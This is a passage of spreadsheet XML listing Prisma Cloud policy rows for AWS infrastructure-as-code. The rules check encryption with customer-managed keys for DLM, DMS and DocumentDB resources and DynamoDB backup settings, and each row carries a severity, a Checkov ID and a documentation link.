      <c r="N739" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O739" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P739" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q739" t="inlineStr"/>
      <c r="R739" t="inlineStr"/>
      <c r="S739" t="inlineStr"/>
      <c r="T739" t="b">
        <v>0</v>
      </c>
      <c r="U739" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V739" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm-lifecycle-policy</t>
        </is>
      </c>
      <c r="W739" t="inlineStr">
        <is>
          <t>Ensure DLM cross region events are encrypted with Customer Managed Key</t>
        </is>
      </c>
      <c r="X739" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dlm-cross-region-events-are-encrypted-with-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y739" t="inlineStr"/>
      <c r="Z739" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dlm_lifecycle_policy"]}</t>
        </is>
      </c>
      <c r="AA739" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB739" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC739" t="inlineStr">
        <is>
          <t>CKV_AWS_254</t>
        </is>
      </c>
      <c r="AD739" t="b">
        <v>1</v>
      </c>
      <c r="AE739" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF739" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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39" t="inlineStr">
        <is>
          <t>ff63e3d3-1505-40d9-9769-4cfed4f5acb5</t>
        </is>
      </c>
      <c r="AI739" t="inlineStr"/>
      <c r="AJ739" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK739" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" t="inlineStr"/>
      <c r="B740" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C740" s="2" t="inlineStr"/>
      <c r="D740" t="inlineStr"/>
      <c r="E740" t="inlineStr"/>
      <c r="F740" t="inlineStr"/>
      <c r="G740" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J740" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm</t>
        </is>
      </c>
      <c r="K740" t="inlineStr">
        <is>
          <t>AWS DLM cross-region schedules are not encrypted using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L740" t="inlineStr"/>
      <c r="M740" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N740" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O740" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P740" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q740" t="inlineStr"/>
      <c r="R740" t="inlineStr"/>
      <c r="S740" t="inlineStr"/>
      <c r="T740" t="b">
        <v>0</v>
      </c>
      <c r="U740" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V740" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm-lifecycle-policy</t>
        </is>
      </c>
      <c r="W740" t="inlineStr">
        <is>
          <t>Ensure DLM cross region schedules are encrypted using a Customer Managed Key</t>
        </is>
      </c>
      <c r="X740" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dlm-cross-region-schedules-are-encrypted-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y740" t="inlineStr"/>
      <c r="Z740" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dlm_lifecycle_policy"]}</t>
        </is>
      </c>
      <c r="AA740" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB740" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC740" t="inlineStr">
        <is>
          <t>CKV_AWS_256</t>
        </is>
      </c>
      <c r="AD740" t="b">
        <v>1</v>
      </c>
      <c r="AE740" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF740" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>e441ce55-a161-43ec-af94-fe00150d0032</t>
        </is>
      </c>
      <c r="AI740" t="inlineStr"/>
      <c r="AJ740" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK740" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" t="inlineStr"/>
      <c r="B741" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C741" s="2" t="inlineStr"/>
      <c r="D741" t="inlineStr"/>
      <c r="E741" t="inlineStr"/>
      <c r="F741" t="inlineStr"/>
      <c r="G741" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J741" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm</t>
        </is>
      </c>
      <c r="K741" t="inlineStr">
        <is>
          <t>AWS DLM-cross region schedules are not encrypted</t>
        </is>
      </c>
      <c r="L741" t="inlineStr"/>
      <c r="M741" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N741" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O741" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P741" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q741" t="inlineStr"/>
      <c r="R741" t="inlineStr"/>
      <c r="S741" t="inlineStr"/>
      <c r="T741" t="b">
        <v>0</v>
      </c>
      <c r="U741" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V741" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm-lifecycle-policy</t>
        </is>
      </c>
      <c r="W741" t="inlineStr">
        <is>
          <t>Ensure DLM cross region schedules are encrypted</t>
        </is>
      </c>
      <c r="X741" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dlm-cross-region-schedules-are-encrypted</t>
        </is>
      </c>
      <c r="Y741" t="inlineStr"/>
      <c r="Z741" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dlm_lifecycle_policy"]}</t>
        </is>
      </c>
      <c r="AA741" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB741" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC741" t="inlineStr">
        <is>
          <t>CKV_AWS_255</t>
        </is>
      </c>
      <c r="AD741" t="b">
        <v>1</v>
      </c>
      <c r="AE741" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF741" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>6762bf14-4293-4ecb-a418-497320c9a1fb</t>
        </is>
      </c>
      <c r="AI741" t="inlineStr"/>
      <c r="AJ741" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK741" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" t="inlineStr"/>
      <c r="B742" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C742" s="2" t="inlineStr"/>
      <c r="D742" t="inlineStr"/>
      <c r="E742" t="inlineStr"/>
      <c r="F742" t="inlineStr"/>
      <c r="G742" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J742" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm</t>
        </is>
      </c>
      <c r="K742" t="inlineStr">
        <is>
          <t>AWS DLM cross-region events are not encrypted</t>
        </is>
      </c>
      <c r="L742" t="inlineStr"/>
      <c r="M742" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N742" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O742" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P742" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q742" t="inlineStr"/>
      <c r="R742" t="inlineStr"/>
      <c r="S742" t="inlineStr"/>
      <c r="T742" t="b">
        <v>0</v>
      </c>
      <c r="U742" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V742" t="inlineStr">
        <is>
          <t>IaC:General:aws-dlm-lifecycle-policy</t>
        </is>
      </c>
      <c r="W742" t="inlineStr">
        <is>
          <t>Ensure DLM cross region events are encrypted</t>
        </is>
      </c>
      <c r="X742" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-dlm-cross-region-events-are-encrypted</t>
        </is>
      </c>
      <c r="Y742" t="inlineStr"/>
      <c r="Z742" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dlm_lifecycle_policy"]}</t>
        </is>
      </c>
      <c r="AA742" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB742" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC742" t="inlineStr">
        <is>
          <t>CKV_AWS_253</t>
        </is>
      </c>
      <c r="AD742" t="b">
        <v>1</v>
      </c>
      <c r="AE742" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF742" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>867f3393-952c-4ada-9fb8-3cadd8e0951f</t>
        </is>
      </c>
      <c r="AI742" t="inlineStr"/>
      <c r="AJ742" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK742" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" t="inlineStr"/>
      <c r="B743" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C743" s="2" t="inlineStr"/>
      <c r="D743" t="inlineStr"/>
      <c r="E743" t="inlineStr"/>
      <c r="F743" t="inlineStr"/>
      <c r="G743" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J743" t="inlineStr">
        <is>
          <t>IaC:General:aws-dms</t>
        </is>
      </c>
      <c r="K743" t="inlineStr">
        <is>
          <t>DMS endpoint is not using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L743" t="inlineStr"/>
      <c r="M743" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N743" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O743" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P743" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q743" t="inlineStr"/>
      <c r="R743" t="inlineStr"/>
      <c r="S743" t="inlineStr"/>
      <c r="T743" t="b">
        <v>0</v>
      </c>
      <c r="U743" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V743" t="inlineStr">
        <is>
          <t>IaC:General:aws-dms-endpoint</t>
        </is>
      </c>
      <c r="W743" t="inlineStr">
        <is>
          <t>Ensure DMS endpoint uses Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X743" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-296</t>
        </is>
      </c>
      <c r="Y743" t="inlineStr"/>
      <c r="Z743" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dms_endpoint"]}</t>
        </is>
      </c>
      <c r="AA743" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB743" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC743" t="inlineStr">
        <is>
          <t>CKV_AWS_296</t>
        </is>
      </c>
      <c r="AD743" t="b">
        <v>1</v>
      </c>
      <c r="AE743" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF743" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>cb92477a-1086-43a2-944a-7b3cc9f7762f</t>
        </is>
      </c>
      <c r="AI743" t="inlineStr"/>
      <c r="AJ743" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK743" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" t="inlineStr"/>
      <c r="B744" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C744" s="2" t="inlineStr"/>
      <c r="D744" t="inlineStr"/>
      <c r="E744" t="inlineStr"/>
      <c r="F744" t="inlineStr"/>
      <c r="G744" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J744" t="inlineStr">
        <is>
          <t>IaC:General:aws-dms</t>
        </is>
      </c>
      <c r="K744" t="inlineStr">
        <is>
          <t>AWS EBS Volume is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L744" t="inlineStr"/>
      <c r="M744" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N744" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O744" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P744" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q744" t="inlineStr"/>
      <c r="R744" t="inlineStr"/>
      <c r="S744" t="inlineStr"/>
      <c r="T744" t="b">
        <v>0</v>
      </c>
      <c r="U744" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V744" t="inlineStr">
        <is>
          <t>IaC:General:aws-dms-replication-instance</t>
        </is>
      </c>
      <c r="W744" t="inlineStr">
        <is>
          <t>Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X744" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-ebs-volume-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y744" t="inlineStr"/>
      <c r="Z744" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dms_replication_instance"]}</t>
        </is>
      </c>
      <c r="AA744" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB744" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC744" t="inlineStr">
        <is>
          <t>CKV_AWS_212</t>
        </is>
      </c>
      <c r="AD744" t="b">
        <v>1</v>
      </c>
      <c r="AE744" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF744" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>9f029d31-5017-4788-86b9-50945d9efec8</t>
        </is>
      </c>
      <c r="AI744" t="inlineStr"/>
      <c r="AJ744" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK744" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" t="inlineStr"/>
      <c r="B745" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C745" s="2" t="inlineStr"/>
      <c r="D745" t="inlineStr"/>
      <c r="E745" t="inlineStr"/>
      <c r="F745" t="inlineStr"/>
      <c r="G745" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J745" t="inlineStr">
        <is>
          <t>IaC:General:aws-dms</t>
        </is>
      </c>
      <c r="K745" t="inlineStr">
        <is>
          <t>The DMS S3 does not use a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L745" t="inlineStr"/>
      <c r="M745" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N745" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O745" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P745" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q745" t="inlineStr"/>
      <c r="R745" t="inlineStr"/>
      <c r="S745" t="inlineStr"/>
      <c r="T745" t="b">
        <v>0</v>
      </c>
      <c r="U745" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V745" t="inlineStr">
        <is>
          <t>IaC:General:aws-dms-s3-endpoint</t>
        </is>
      </c>
      <c r="W745" t="inlineStr">
        <is>
          <t>Ensure DMS S3 uses Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X745" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-298</t>
        </is>
      </c>
      <c r="Y745" t="inlineStr"/>
      <c r="Z745" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_dms_s3_endpoint"]}</t>
        </is>
      </c>
      <c r="AA745" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB745" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC745" t="inlineStr">
        <is>
          <t>CKV_AWS_298</t>
        </is>
      </c>
      <c r="AD745" t="b">
        <v>1</v>
      </c>
      <c r="AE745" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF745" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>26a99f76-1559-4581-8817-668d04e20724</t>
        </is>
      </c>
      <c r="AI745" t="inlineStr"/>
      <c r="AJ745" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK745" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" t="inlineStr"/>
      <c r="B746" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C746" s="2" t="inlineStr"/>
      <c r="D746" t="inlineStr"/>
      <c r="E746" t="inlineStr"/>
      <c r="F746" t="inlineStr"/>
      <c r="G746" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J746" t="inlineStr">
        <is>
          <t>IaC:General:aws-docdb</t>
        </is>
      </c>
      <c r="K746" t="inlineStr">
        <is>
          <t>AWS  Doc DB not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L746" t="inlineStr"/>
      <c r="M746" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N746" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O746" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P746" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q746" t="inlineStr"/>
      <c r="R746" t="inlineStr"/>
      <c r="S746" t="inlineStr"/>
      <c r="T746" t="b">
        <v>0</v>
      </c>
      <c r="U746" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V746" t="inlineStr">
        <is>
          <t>IaC:General:aws-docdb-cluster</t>
        </is>
      </c>
      <c r="W746" t="inlineStr">
        <is>
          <t>Ensure Doc DB is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X746" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-102</t>
        </is>
      </c>
      <c r="Y746" t="inlineStr"/>
      <c r="Z746" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_docdb_cluster"]}</t>
        </is>
      </c>
      <c r="AA746" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB746" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC746" t="inlineStr">
        <is>
          <t>CKV_AWS_182</t>
        </is>
      </c>
      <c r="AD746" t="b">
        <v>1</v>
      </c>
      <c r="AE746" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF746" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>49040160-0201-47a2-aa6e-4a6e3202d45a</t>
        </is>
      </c>
      <c r="AI746" t="inlineStr"/>
      <c r="AJ746" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK746" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" t="inlineStr"/>
      <c r="B747" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C747" s="2" t="inlineStr"/>
      <c r="D747" t="inlineStr"/>
      <c r="E747" t="inlineStr"/>
      <c r="F747" t="inlineStr"/>
      <c r="G747" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J747" t="inlineStr">
        <is>
          <t>IaC:General:aws-docdb</t>
        </is>
      </c>
      <c r="K747" t="inlineStr">
        <is>
          <t>DocumentDB is not encrypted at rest</t>
        </is>
      </c>
      <c r="L747" t="inlineStr"/>
      <c r="M747" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N747" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O747" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P747" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q747" t="inlineStr"/>
      <c r="R747" t="inlineStr"/>
      <c r="S747" t="inlineStr"/>
      <c r="T747" t="b">
        <v>0</v>
      </c>
      <c r="U747" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V747" t="inlineStr">
        <is>
          <t>IaC:General:aws-docdb-cluster</t>
        </is>
      </c>
      <c r="W747" t="inlineStr">
        <is>
          <t>Ensure DocDB is encrypted at rest</t>
        </is>
      </c>
      <c r="X747" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28</t>
        </is>
      </c>
      <c r="Y747" t="inlineStr"/>
      <c r="Z747" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_docdb_cluster"]}</t>
        </is>
      </c>
      <c r="AA747" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB747" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC747" t="inlineStr">
        <is>
          <t>CKV_AWS_74</t>
        </is>
      </c>
      <c r="AD747" t="b">
        <v>1</v>
      </c>
      <c r="AE747" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF747" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>08e1e43c-e9e3-40a2-8201-65147b3a9dfd</t>
        </is>
      </c>
      <c r="AI747" t="inlineStr"/>
      <c r="AJ747" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK747" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" t="inlineStr"/>
      <c r="B748" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C748" s="2" t="inlineStr"/>
      <c r="D748" t="inlineStr"/>
      <c r="E748" t="inlineStr"/>
      <c r="F748" t="inlineStr"/>
      <c r="G748" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J748" t="inlineStr">
        <is>
          <t>IaC:General:aws-docdb</t>
        </is>
      </c>
      <c r="K748" t="inlineStr">
        <is>
          <t>DocDB Global Cluster is not encrypted at rest</t>
        </is>
      </c>
      <c r="L748" t="inlineStr"/>
      <c r="M748" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N748" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O748" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P748" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q748" t="inlineStr"/>
      <c r="R748" t="inlineStr"/>
      <c r="S748" t="inlineStr"/>
      <c r="T748" t="b">
        <v>0</v>
      </c>
      <c r="U748" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V748" t="inlineStr">
        <is>
          <t>IaC:General:aws-docdb-global-cluster</t>
        </is>
      </c>
      <c r="W748" t="inlineStr">
        <is>
          <t>Ensure DocDB Global Cluster is encrypted at rest (default is unencrypted)</t>
        </is>
      </c>
      <c r="X748" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-292</t>
        </is>
      </c>
      <c r="Y748" t="inlineStr"/>
      <c r="Z748" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_docdb_global_cluster"]}</t>
        </is>
      </c>
      <c r="AA748" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB748" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC748" t="inlineStr">
        <is>
          <t>CKV_AWS_292</t>
        </is>
      </c>
      <c r="AD748" t="b">
        <v>1</v>
      </c>
      <c r="AE748" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF748" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>5e6294f2-8e6e-4e76-ad6d-1177b2178a12</t>
        </is>
      </c>
      <c r="AI748" t="inlineStr"/>
      <c r="AJ748" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK748" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" t="inlineStr"/>
      <c r="B749" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C749" s="2" t="inlineStr"/>
      <c r="D749" t="inlineStr"/>
      <c r="E749" t="inlineStr"/>
      <c r="F749" t="inlineStr"/>
      <c r="G749" t="b">
        <v>1</v>
      </c>
      <c r="H7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49" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J749" t="inlineStr">
        <is>
          <t>IaC:General:aws-dynamodb</t>
        </is>
      </c>
      <c r="K749" t="inlineStr">
        <is>
          <t>Dynamodb point in time recovery is not enabled for global tables</t>
        </is>
      </c>
      <c r="L749" t="inlineStr"/>
      <c r="M749" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N749" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O749" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P749" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q749" t="inlineStr"/>
      <c r="R749" t="inlineStr"/>
      <c r="S749" t="inlineStr"/>
      <c r="T749" t="b">
        <v>0</v>
      </c>
      <c r="U749" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V749" t="inlineStr">
        <is>
          <t>IaC:General:aws-dynamodb-global-table</t>
        </is>
      </c>
      <c r="W749" t="inlineStr">
        <is>
          <t>Ensure Dynamodb point in time recovery (backup) is enabled for global tables</t>
        </is>
      </c>
      <c r="X749" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
